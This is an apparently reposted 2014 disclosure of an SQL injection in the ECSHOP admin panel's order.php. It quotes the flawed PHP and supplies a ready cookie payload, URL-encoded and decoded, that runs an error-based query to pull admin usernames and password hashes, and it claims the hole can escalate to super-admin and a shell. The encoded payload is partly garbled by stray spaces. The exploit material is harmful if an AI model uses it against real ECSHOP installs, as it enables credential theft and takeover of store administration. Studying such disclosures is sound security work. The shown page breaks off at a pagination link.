ECSHOP background low-privileged sql injection-vulnerability warning-the black bar safety net

2014-02-03T00:00:00
ID MYHACK58:62201442124
Type myhack58
Reporter 酱油甲@乌云
Modified 2014-02-03T00:00:00

Description

Brief description:

ECSHOP background low permissionssql injectionone

Detailed description:

General Delivery clerk in the landing after just need a list of orders of permission, which is a low administrator can be injected to give the super pipe permissions

As with file permissions, you can also getshell

The problem is in the/admin/order. php

if (! empty($_COOKIE['ECSCP']['lastfilter']))

{

$filter = unserialize(urldecode($_COOKIE['ECSCP']['lastfilter']));///// //here urldecode$_COOKIE['ECSCP']['lastfilter'], poor GPC~~alas......

if (! empty($filter['composite_status']))

{

$where = ";

//General state

switch($filter['composite_status'])

{

case CS_AWAIT_PAY :

$where .= order_query_sql('await_pay');

break;

case CS_AWAIT_SHIP :

$where .= order_query_sql('await_ship');

break;

case CS_FINISHED :

$where .= order_query_sql('finished');

break;

default:

if ($filter['composite_status'] != -1)

{

$where .= "AND o. order_status = '$filter[composite_status]' "; //here will composite_status directly into the sql

}

}

}

------ Detailed process------------------------------------------

  1. Click on the order list:

!

  1. After clicking on will set three cookies, modify ECSCP[lastfilter]for The is actually modified composite_status: the

!

Modify ECSCP[lastfilter]for The is actually modified composite_status: the

a%253A28%253A%257Bs%253A8%253A%2522order_sn%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A9%253A%2522consignee%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A5%253A%2522email%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A7%253A%2522address%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A7%253A%2522zipcode%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A3%253A%2522tel%2 5 2 2%253Bs%253A0% 253A%2 5 2 2% 2 5 2 2%253Bs%253A6%253A%2522mobile%2 5 2 2%253Bi%253A0%253Bs%253A7%253A%2522country%2 5 2 2%253Bi%253A0%253Bs%253A8%253A%2522province%2 5 2 2%253Bi%253A0%253Bs%253A4%253A%2522city%2 5 2 2%253Bi%253A0%253Bs%253A8%253A%2522district%2 5 2 2%253Bi%253A0%253Bs%253A11%253A%2522shipping_id%2 5 2 2%253Bi%253A0%253Bs%253A6%253A%2522pay_id%2 5 2 2%253Bi%253A0%253Bs%253A12%253A%2522order_status%2 5 2 2%253Bi%253A-1% 253Bs%253A15%253A%2522shipping_status%2 5 2 2%253Bi%253A-1%253Bs%253A10%253A%2522pay_status%2 5 2 2%253Bi%253A-1%253Bs%253A7%253A%2522user_id%2 5 2 2%253Bi%253A0%253Bs%253A9%253A%2522user_name%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A16%253A%2522composite_status%2 5 2 2%253Bi%253A-1%253Bs%253A12%253A%2522group_buy_id%2 5 2 2%253Bi%253A0%253Bs%253A7%253A%2522sort_by%2 5 2 2%253Bs%253A8%253A%2522add_time%2 5 2 2%253Bs%253A10% 253A%2522sort_order%2 5 2 2%253Bs%253A4%253A%2522DESC%2 5 2 2%253Bs%253A10%253A%2522start_time%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A8%253A%2522end_time%2 5 2 2%253Bs%253A0%253A%2 5 2 2% 2 5 2 2%253Bs%253A4%253A%2522page%2 5 2 2%253Bi%253A1%253Bs%253A9%253A%2522page_size%2 5 2 2%253Bi%253A15%253Bs%253A12%253A%2522record_count%2 5 2 2%253Bs%253A2%253A%2 5 2 2 1 9% 2 5 2 2%253Bs%253A10%253A%2522page_count%2 5 2 2%253Bd%253A2%253B% 257D

That is

a:2 8:{s:8:"order_sn";s:0:"";s:9:"consignee";s:0:"";s:5:"email";s:0:"";s:7:"address";s:0:"";s:7:"zipcode";s:0:"";s:3:"tel";s:0:"";s:6:"mobile";i:0;s:7:"country";i:0; s:8:"province";i:0;s:4:"city";i:0;s:8:"district";i:0;s:1 1:"shipping_id";i:0;s:6:"pay_id";i:0;s:1 2:"order_status";i:-1;s:1 5:"shipping_status";i:-1;s:1 0:"pay_status";i:-1;s:7:"user_id";i:0;s:9:"user_name";s:3: "3 3 3";s:1 6:"composite_status";s:2 0 0:"1' and (select 1 from(select count(),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ecs_admin_user limit 0,1),floor(rand(0)2))x from information_schema. tables group by x)a) and '1'='1";s:1 2:"group_buy_id";i:0;s:7:"sort_by";s:8:"add_time";s:1 0:"sort_order";s:4:"DESC";s:1 0:"start_time";s:0:"";s:8:"end_time";s:0:"";s:4:"page";i:1;s:9:"page_size";i:1 5;s:1 2:"record_count";s:2:"1 to 9";s:1 0:"page_count";d:2;}

[1] [2] next